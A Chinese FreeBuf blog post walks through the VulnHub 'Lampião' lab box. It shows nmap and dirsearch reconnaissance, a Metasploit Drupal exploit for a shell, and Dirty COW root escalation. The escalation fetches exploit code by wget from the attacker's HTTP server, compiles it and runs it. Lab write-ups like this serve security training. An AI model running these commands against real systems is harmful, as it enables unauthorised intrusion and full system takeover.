freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Lampião打靶记录
木樨 2022-10-10 20:59:58 103376
所属地 香港

一、前期准备

1.下载地址

https://www.vulnhub.com/entry/lampiao-1,249/#download

1665325135_6342d84f1a6f84cc7c8e0.png!small


2、导入

1665325275_6342d8db2c4d4c5a03ef4.png!small

3、网络设置

桥接至物理网卡后启动。

1665325385_6342d949b831ad8a6baad.png!small

二、信息收集

1、发现靶场ip

1665325634_6342da4215a294e2bd09c.png!small

1665325769_6342dac99c39d5cfdf95e.png!small















2、全端口扫描

nmap -Pn -p 0-65535 -O 192.168.0.101 

1665326181_6342dc65aea969ed1f162.png!small











3、目录扫描

python3 dirsearch.py -u http://192.168.0.101:1898/-x 403
python3 dirsearch.py -u http://192.168.0.101

1665326649_6342de392dfc742f6b3a7.png!small








1665326731_6342de8b39f04f179428d.png!small












4、发现敏感信息

访问特殊文件,发现爆出drupal框架版本

http://192.168.0.101:1898/CHANGELOG.txt

1665326861_6342df0dbc390e152fbda.png!small












信息收集:drupal

Drupal是使用PHP语言编写的开源内容管理框架(CMF)

漏洞查询:查询后发现存在大量的版本漏洞

三、漏洞利用

1、启动msfconsole

搜索Drupal漏洞exp

search drupal

1665327558_6342e1c627790e2dd278d.png!small













2、根据信息收集

根据版本进行漏洞测试

show option #查看参数
set rhost 192.168.0.101 # 服务远程ip
set rport 1898 # 服务端口
exploit #启动

1665327789_6342e2adcdf2a229bbd27.png!small











利用成功。获取shell

1665327848_6342e2e89bfeabde4f829.png!small








四、提权

1、信息收集

uname -a

1665328421_6342e525a45e067bb3405.png!small

第一个版本Ubuntu 4.10即发行于2004年10月20日

尝试使用脏牛提权。

上传提权漏洞检测脚本。

1665403496_63440a68b756582a20fd6.png!small?1665403496775

2、漏洞检测脚本执行

chmod +777 1.sh
/1.sh

1665403597_63440acdd4b5c8d416d1c.png!small?1665403597879

3、发现脏牛漏洞,

脏牛漏洞利用简单,利用成功率高

寻找提权脚本
searchsploit dirty #查看脚本
locate linux/local/40847.cpp #寻找脚本所在位置 scp /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp #复制文件到 /tmp

1665405903_634413cf7d4b5fb29485f.png!small?1665405903940

python3 -m http.server 800 #启用http服务

1665406123_634414ab34921cdc6669b.png!small?1665406123229

wget http://192.168.0.110:800/40847.cpp  #下载文件
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil   # 编译文件
chmod +777 40847
./40847z

4、执行成功。

显示密码

1665406273_63441541c41c86f9c0e0f.png!small?1665406273647

5、连接:

ssh root@192.168.0.104

1665406384_634415b0edb6969e27eaa.png!small?1665406386036


# 漏洞 # web安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 木樨 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
木樨 LV.4
这家伙太懒了,还未填写个人描述!
  • 11 文章数
  • 3 关注者
CMS Made Simple v2.2.15-RCE
2023-02-06
ED01-CMS v20180505
2023-02-06
春秋云境界---CVE-2022-28512
2023-02-05
文章目录